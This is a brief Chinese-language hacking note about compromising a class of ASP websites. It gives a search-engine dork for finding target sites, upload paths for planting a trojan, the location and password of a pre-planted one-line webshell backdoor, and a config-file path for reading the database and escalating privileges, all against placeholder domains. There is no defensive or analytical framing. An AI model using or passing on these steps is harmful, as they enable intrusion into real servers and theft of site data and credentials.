准确点应该算是backdoor
inurl:Find.asp 您的位置 >> 客服中心 >> 找回密码
直接传马:
http://www.xxxx.net/user/situjiaduotu2.asp
一句话backdoor ,密码 : value
http://www.xxxx.net/htmledit/Include/upfile_class.asp
http://www.xxxx.net/htmledit\Include\DeCode.asp
读库提权:
D:\web\www.xxx.net\Inc\Config.asp